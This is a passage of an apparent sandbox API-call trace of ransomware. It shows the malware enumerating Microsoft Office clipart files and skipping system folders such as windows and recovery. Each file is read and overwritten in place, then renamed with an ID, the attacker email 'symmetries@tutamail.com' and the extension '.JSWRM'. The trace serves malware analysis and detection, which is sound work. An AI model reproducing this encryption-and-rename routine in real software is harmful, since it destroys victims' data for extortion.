(HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0088.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0088.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.862] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287020.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287020.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287020.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287020.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0088.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0088.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0088.863] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3946e4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3946e4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3ba90e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc6d2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0287024.WMF", cAlternateFileName="")) returned 1 [0088.863] lstrcmpiW (lpString1="J0287024.WMF", lpString2=".") returned 1 [0088.863] lstrcmpiW (lpString1="J0287024.WMF", lpString2="..") returned 1 [0088.863] lstrcmpiW (lpString1="J0287024.WMF", lpString2="...") returned 1 [0088.863] lstrcmpiW (lpString1="J0287024.WMF", lpString2="windows") returned -1 [0088.863] lstrcmpiW (lpString1="J0287024.WMF", lpString2="recovery") returned -1 [0088.863] lstrcmpiW (lpString1="J0287024.WMF", lpString2="perflogs") returned -1 [0088.863] lstrcmpiW (lpString1="J0287024.WMF", lpString2="documents and settings") returned 1 [0088.863] lstrcmpiW (lpString1="J0287024.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.863] lstrcmpiW (lpString1="J0287024.WMF", lpString2="system volume information") returned -1 [0088.863] lstrcmpiW (lpString1="J0287024.WMF", lpString2="msocache") returned -1 [0088.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0088.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287024.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287024.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0287024.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0088.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0088.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287024.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287024.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0287024.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0088.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0088.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0088.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0088.864] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287024.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287024.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.870] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=50898) returned 1 [0088.870] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc6d0) returned 0x24d210 [0088.871] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xc6d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xc6d0, lpOverlapped=0x0) returned 1 [0088.876] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.876] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xc6d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xc6d0, lpOverlapped=0x0) returned 1 [0088.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.877] CloseHandle (hObject=0x314) returned 1 [0088.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0088.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0088.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0088.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0088.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0088.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0088.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.877] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287024.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287024.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287024.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287024.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0088.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0088.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0088.878] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3946e4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3946e4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3ba90e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcd10, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0287408.WMF", cAlternateFileName="")) returned 1 [0088.878] lstrcmpiW (lpString1="J0287408.WMF", lpString2=".") returned 1 [0088.878] lstrcmpiW (lpString1="J0287408.WMF", lpString2="..") returned 1 [0088.878] lstrcmpiW (lpString1="J0287408.WMF", lpString2="...") returned 1 [0088.878] lstrcmpiW (lpString1="J0287408.WMF", lpString2="windows") returned -1 [0088.878] lstrcmpiW (lpString1="J0287408.WMF", lpString2="recovery") returned -1 [0088.878] lstrcmpiW (lpString1="J0287408.WMF", lpString2="perflogs") returned -1 [0088.878] lstrcmpiW (lpString1="J0287408.WMF", lpString2="documents and settings") returned 1 [0088.878] lstrcmpiW (lpString1="J0287408.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.878] lstrcmpiW (lpString1="J0287408.WMF", lpString2="system volume information") returned -1 [0088.879] lstrcmpiW (lpString1="J0287408.WMF", lpString2="msocache") returned -1 [0088.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0088.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287408.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287408.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0287408.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0088.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0088.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287408.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287408.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0287408.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0088.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0088.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0088.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0088.879] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287408.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287408.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.880] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=52496) returned 1 [0088.880] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xcd10) returned 0x24d210 [0088.881] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xcd10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xcd10, lpOverlapped=0x0) returned 1 [0088.889] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.889] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xcd10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xcd10, lpOverlapped=0x0) returned 1 [0088.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.890] CloseHandle (hObject=0x314) returned 1 [0088.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0088.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0088.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0088.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0088.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0088.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0088.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.890] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287408.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287408.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287408.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287408.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0088.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0088.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0088.891] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3946e4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3946e4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3ba90e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa80c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0287415.WMF", cAlternateFileName="")) returned 1 [0088.891] lstrcmpiW (lpString1="J0287415.WMF", lpString2=".") returned 1 [0088.891] lstrcmpiW (lpString1="J0287415.WMF", lpString2="..") returned 1 [0088.892] lstrcmpiW (lpString1="J0287415.WMF", lpString2="...") returned 1 [0088.892] lstrcmpiW (lpString1="J0287415.WMF", lpString2="windows") returned -1 [0088.892] lstrcmpiW (lpString1="J0287415.WMF", lpString2="recovery") returned -1 [0088.892] lstrcmpiW (lpString1="J0287415.WMF", lpString2="perflogs") returned -1 [0088.892] lstrcmpiW (lpString1="J0287415.WMF", lpString2="documents and settings") returned 1 [0088.892] lstrcmpiW (lpString1="J0287415.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.892] lstrcmpiW (lpString1="J0287415.WMF", lpString2="system volume information") returned -1 [0088.892] lstrcmpiW (lpString1="J0287415.WMF", lpString2="msocache") returned -1 [0088.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0088.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287415.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287415.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0287415.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0088.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0088.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287415.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0287415.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0287415.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0088.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0088.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0088.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0088.892] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287415.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287415.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.893] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=43020) returned 1 [0088.893] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa800) returned 0x24d210 [0088.894] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xa800, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xa800, lpOverlapped=0x0) returned 1 [0088.898] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.898] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xa800, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xa800, lpOverlapped=0x0) returned 1 [0088.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.899] CloseHandle (hObject=0x314) returned 1 [0088.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0088.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0088.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0088.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0088.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0088.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0088.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0088.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0088.900] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287415.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287415.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287415.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287415.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0088.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0088.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0088.900] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3946e4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3946e4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3946e4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd6bc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0287417.WMF", cAlternateFileName="")) returned 1 [0088.900] lstrcmpiW (lpString1="J0287417.WMF", lpString2=".") returned 1 [0088.900] lstrcmpiW (lpString1="J0287417.WMF", lpString2="..") returned 1 [0088.901] lstrcmpiW (lpString1="J0287417.WMF", lpString2="...") returned 1 [0088.901] lstrcmpiW (lpString1="J0287417.WMF", lpString2="windows") returned -1 [0088.901] lstrcmpiW (lpString1="J0287417.WMF", lpString2="recovery") returned -1 [0088.901] lstrcmpiW (lpString1="J0287417.WMF", lpString2="perflogs") returned -1 [0088.901] lstrcmpiW (lpString1="J0287417.WMF", lpString2="documents and settings") returned 1 [0088.901] 